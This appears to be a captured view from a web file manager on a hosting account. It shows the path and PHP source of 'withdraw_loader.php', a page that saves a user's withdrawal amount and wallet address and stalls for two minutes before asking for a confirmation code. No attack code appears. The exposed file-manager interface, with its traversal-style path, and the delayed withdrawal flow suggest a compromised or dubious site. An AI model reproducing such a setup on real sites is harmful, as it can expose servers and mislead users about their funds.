File Manager Script
X

Create New Item

File Folder

X

Search Results

File "withdraw_loader.php"

Full path: /home/quiczmwg/lightspringdigitals.com/../../quiczmwg/public_html/withdraw_loader.php
File size: 1.21 KiB (1237 bytes)
MIME-type: text/x-php; charset=us-ascii
Charset: utf-8

Download   Open   Edit   Advanced Edit   Back

<?php
session_start();
if (!isset($_POST['userid'], $_POST['amount'], $_POST['wallet_address'])) {
    header("Location: withdraw.php");
    exit();
}

// Save data temporarily
$_SESSION['withdraw_temp'] = [
    'userid' => $_POST['userid'],
    'amount' => $_POST['amount'],
    'wallet_address' => $_POST['wallet_address']
];
?>

<!DOCTYPE html>
<html>
<head>
  <title>Processing Withdrawal...</title>
  <meta http-equiv="refresh" content="120;url=withdraw_code.php"> <!-- 2 min delay -->
  <style>
    body {
      font-family: Arial;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      background: #f8f9fa;
      text-align: center;
    }
    .loader {
      border: 8px solid #ccc;
      border-top: 8px solid #28a745;
      border-radius: 50%;
      width: 80px;
      height: 80px;
      animation: spin 1s linear infinite;
      margin: 20px auto;
    }
    @keyframes spin {
      0% { transform: rotate(0deg);}
      100% { transform: rotate(360deg);}
    }
  </style>
</head>
<body>
  <div>
    <h2>Processing your withdrawal...</h2>
    <div class="loader"></div>
    <p>Please wait, you will be redirected to confirm your code in 2 minutes.</p>
  </div>
</body>
</html>